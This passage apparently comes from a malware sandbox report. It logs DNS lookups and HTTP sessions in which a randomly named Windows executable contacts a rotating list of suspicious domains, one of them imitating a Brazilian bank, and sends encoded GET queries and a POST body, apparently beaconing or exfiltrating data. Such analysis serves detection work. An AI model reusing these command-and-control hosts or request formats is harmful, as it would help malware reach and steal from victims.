                        Sep 3, 2024 10:46:51.843878031 CEST | 80 | 65019 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:51.843888044 CEST | 80 | 65019 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:51.843934059 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:51.843934059 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:52.082355022 CEST | 80 | 65019 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:52.082405090 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:52.278079033 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:53.297483921 CEST | 65020 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:53.304629087 CEST | 80 | 65020 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:53.306600094 CEST | 65020 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:53.322487116 CEST | 65020 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:53.328233957 CEST | 80 | 65020 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:54.222376108 CEST | 80 | 65020 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:54.223244905 CEST | 80 | 65020 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:54.223315001 CEST | 65020 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:54.828511953 CEST | 65020 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:55.843957901 CEST | 65021 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:55.848828077 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.848896980 CEST | 65021 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:55.862021923 CEST | 65021 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:55.866986036 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.866997957 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867089987 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867099047 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867160082 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867168903 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867183924 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867192984 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:55.867199898 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:56.812345982 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:56.812608004 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:56.812757969 CEST | 80 | 65021 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:56.818564892 CEST | 65021 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:57.374485970 CEST | 65021 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:58.389928102 CEST | 65022 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:58.394860983 CEST | 80 | 65022 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:58.394936085 CEST | 65022 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:58.401916027 CEST | 65022 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:58.408644915 CEST | 80 | 65022 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:59.348114014 CEST | 80 | 65022 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:59.349360943 CEST | 80 | 65022 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:59.349419117 CEST | 65022 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:59.354482889 CEST | 65022 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:59.359266996 CEST | 80 | 65022 | 188.114.97.3 | 192.168.2.4
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Sep 3, 2024 10:43:30.682430029 CEST | 62582 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:43:31.222335100 CEST | 53 | 62582 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:43:32.159452915 CEST | 53 | 58537 | 162.159.36.2 | 192.168.2.4
                        Sep 3, 2024 10:43:32.626281977 CEST | 64319 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:43:32.633683920 CEST | 53 | 64319 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:43:46.766138077 CEST | 50118 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:43:46.864938021 CEST | 53 | 50118 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:44:00.078264952 CEST | 50700 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:44:00.842576981 CEST | 53 | 50700 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:44:14.437024117 CEST | 62975 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:44:27.921328068 CEST | 49257 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:44:27.937509060 CEST | 53 | 49257 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:44:41.375121117 CEST | 56780 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:44:41.453557014 CEST | 53 | 56780 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:44:54.750368118 CEST | 60690 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:44:54.763676882 CEST | 53 | 60690 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:45:02.830327034 CEST | 64681 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:45:02.949520111 CEST | 53 | 64681 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:45:25.411379099 CEST | 51732 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:45:25.914899111 CEST | 53 | 51732 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:45:33.969957113 CEST | 61629 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:45:33.995318890 CEST | 53 | 61629 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:45:47.281409025 CEST | 50773 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:45:47.298784971 CEST | 53 | 50773 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:46:00.409715891 CEST | 62378 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:46:01.257359982 CEST | 53 | 62378 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:46:14.892458916 CEST | 63317 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:46:15.581470013 CEST | 53 | 63317 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:46:29.094446898 CEST | 49907 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:46:29.103595018 CEST | 53 | 49907 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:46:37.158464909 CEST | 53756 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:46:37.257754087 CEST | 53 | 53756 | 1.1.1.1 | 192.168.2.4
                        Sep 3, 2024 10:46:50.594384909 CEST | 49823 | 53 | 192.168.2.4 | 1.1.1.1
                        Sep 3, 2024 10:46:50.742693901 CEST | 53 | 49823 | 1.1.1.1 | 192.168.2.4
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Sep 3, 2024 10:43:30.682430029 CEST | 192.168.2.4 | 1.1.1.1 | 0x22a1 | Standard query (0) | www.clientebradesco.online | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:32.626281977 CEST | 192.168.2.4 | 1.1.1.1 | 0x428b | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                        Sep 3, 2024 10:43:46.766138077 CEST | 192.168.2.4 | 1.1.1.1 | 0x8871 | Standard query (0) | www.myim.cloud | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:00.078264952 CEST | 192.168.2.4 | 1.1.1.1 | 0xf2e | Standard query (0) | www.d55dg.top | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:14.437024117 CEST | 192.168.2.4 | 1.1.1.1 | 0x3248 | Standard query (0) | www.arlon-commerce.com | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:27.921328068 CEST | 192.168.2.4 | 1.1.1.1 | 0x1ed7 | Standard query (0) | www.fineg.online | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:41.375121117 CEST | 192.168.2.4 | 1.1.1.1 | 0x7591 | Standard query (0) | www.asian-massage-us.xyz | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:54.750368118 CEST | 192.168.2.4 | 1.1.1.1 | 0xb148 | Standard query (0) | www.thriveline.online | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:02.830327034 CEST | 192.168.2.4 | 1.1.1.1 | 0x3c67 | Standard query (0) | www.aflaksokna.com | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:25.411379099 CEST | 192.168.2.4 | 1.1.1.1 | 0x5454 | Standard query (0) | www.esistiliya.online | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:33.969957113 CEST | 192.168.2.4 | 1.1.1.1 | 0xdb89 | Standard query (0) | www.qiluqiyuan.buzz | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:47.281409025 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b40 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:00.409715891 CEST | 192.168.2.4 | 1.1.1.1 | 0x6937 | Standard query (0) | www.dfbio.net | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:14.892458916 CEST | 192.168.2.4 | 1.1.1.1 | 0x2f69 | Standard query (0) | www.healthsolutions.top | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:29.094446898 CEST | 192.168.2.4 | 1.1.1.1 | 0xfa71 | Standard query (0) | www.950021.com | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:37.158464909 CEST | 192.168.2.4 | 1.1.1.1 | 0xc4c | Standard query (0) | www.golbasi-nakliyat.xyz | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:50.594384909 CEST | 192.168.2.4 | 1.1.1.1 | 0xb7be | Standard query (0) | www.begumnasreenbano.com | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 198.58.118.167 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.33.23.183 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 96.126.123.244 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.79.19.196 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.33.30.197 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 72.14.185.43 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.33.2.79 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.56.79.23 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.33.20.235 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 45.33.18.44 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 173.255.194.134 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:31.222335100 CEST | 1.1.1.1 | 192.168.2.4 | 0x22a1 | No error (0) | www.clientebradesco.online |  | 72.14.178.174 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:43:32.633683920 CEST | 1.1.1.1 | 192.168.2.4 | 0x428b | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                        Sep 3, 2024 10:43:46.864938021 CEST | 1.1.1.1 | 192.168.2.4 | 0x8871 | No error (0) | www.myim.cloud |  | 199.59.243.226 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:00.842576981 CEST | 1.1.1.1 | 192.168.2.4 | 0xf2e | No error (0) | www.d55dg.top | d55dg.top |  | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 3, 2024 10:44:00.842576981 CEST | 1.1.1.1 | 192.168.2.4 | 0xf2e | No error (0) | d55dg.top |  | 154.23.184.240 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:14.522980928 CEST | 1.1.1.1 | 192.168.2.4 | 0x3248 | No error (0) | www.arlon-commerce.com | whois-unverified.domainbox.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 3, 2024 10:44:27.937509060 CEST | 1.1.1.1 | 192.168.2.4 | 0x1ed7 | No error (0) | www.fineg.online |  | 162.0.239.141 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:41.453557014 CEST | 1.1.1.1 | 192.168.2.4 | 0x7591 | No error (0) | www.asian-massage-us.xyz |  | 199.59.243.226 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:44:54.763676882 CEST | 1.1.1.1 | 192.168.2.4 | 0xb148 | Server failure (2) | www.thriveline.online | none | none | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:02.949520111 CEST | 1.1.1.1 | 192.168.2.4 | 0x3c67 | No error (0) | www.aflaksokna.com | aflaksokna.com |  | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 3, 2024 10:45:02.949520111 CEST | 1.1.1.1 | 192.168.2.4 | 0x3c67 | No error (0) | aflaksokna.com |  | 5.144.130.52 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:25.914899111 CEST | 1.1.1.1 | 192.168.2.4 | 0x5454 | Name error (3) | www.esistiliya.online | none | none | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:33.995318890 CEST | 1.1.1.1 | 192.168.2.4 | 0xdb89 | No error (0) | www.qiluqiyuan.buzz |  | 161.97.168.245 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:47.298784971 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b40 | No error (0) | www.omexai.info | omexai.info |  | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 3, 2024 10:45:47.298784971 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b40 | No error (0) | omexai.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:45:47.298784971 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b40 | No error (0) | omexai.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:01.257359982 CEST | 1.1.1.1 | 192.168.2.4 | 0x6937 | No error (0) | www.dfbio.net |  | 218.247.68.184 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:15.581470013 CEST | 1.1.1.1 | 192.168.2.4 | 0x2f69 | No error (0) | www.healthsolutions.top |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:15.581470013 CEST | 1.1.1.1 | 192.168.2.4 | 0x2f69 | No error (0) | www.healthsolutions.top |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:29.103595018 CEST | 1.1.1.1 | 192.168.2.4 | 0xfa71 | Name error (3) | www.950021.com | none | none | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:37.257754087 CEST | 1.1.1.1 | 192.168.2.4 | 0xc4c | No error (0) | www.golbasi-nakliyat.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 3, 2024 10:46:37.257754087 CEST | 1.1.1.1 | 192.168.2.4 | 0xc4c | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 3, 2024 10:46:37.257754087 CEST | 1.1.1.1 | 192.168.2.4 | 0xc4c | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:50.742693901 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7be | No error (0) | www.begumnasreenbano.com |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        Sep 3, 2024 10:46:50.742693901 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7be | No error (0) | www.begumnasreenbano.com |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        • www.clientebradesco.online
                        • www.myim.cloud
                        • www.d55dg.top
                        • www.fineg.online
                        • www.asian-massage-us.xyz
                        • www.aflaksokna.com
                        • www.qiluqiyuan.buzz
                        • www.omexai.info
                        • www.dfbio.net
                        • www.healthsolutions.top
                        • www.golbasi-nakliyat.xyz
                        • www.begumnasreenbano.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49736 | 198.58.118.167 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:43:31.240164042 CEST | 452 | OUT | GET /xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.clientebradesco.online
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:43:31.725141048 CEST | 1236 | IN | HTTP/1.1 200 OK
                        server: openresty/1.13.6.1
                        date: Tue, 03 Sep 2024 08:43:31 GMT
                        content-type: text/html
                        transfer-encoding: chunked
                        connection: close
                        Data Raw: 34 37 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED]
                        Data Ascii: 471<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL3hzZjEiLCAiYXJncyI6ICIwej1tRGNkY1I4JlFkPS8yZHhPQ3I5ZThUdTQ3VnJEdHBTZVgxMG5QdFNnM3BEdEpFdDNjMkZvejVmcHplb1JJdWpCVmpyRE1zS0hjNzArMEs5aVZLQTd2RTlaRkNpTTVPYUZUc2VhbUI1MFozOUUxR3NYSzBiejlTVTg0UHlXckd0RWVnPSIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3ht [TRUNCATED]
                        Sep 3, 2024 10:43:31.725155115 CEST | 69 | IN | Data Raw: 50 54 41 75 4f 43 4a 39 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: PTAuOCJ9"; } </script> </body></html>0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.4 | 64975 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:43:46.882070065 CEST | 706 | OUT | POST /12ts/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.myim.cloud
                        Origin: http://www.myim.cloud
                        Referer: http://www.myim.cloud/12ts/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d
                        Data Ascii: Qd=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
                        Sep 3, 2024 10:43:47.542840004 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:46 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1106
                        x-request-id: cad67dea-fdeb-4d9c-b7b5-fac8dac9a5f5
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                        set-cookie: parking_session=cad67dea-fdeb-4d9c-b7b5-fac8dac9a5f5; expires=Tue, 03 Sep 2024 08:58:47 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
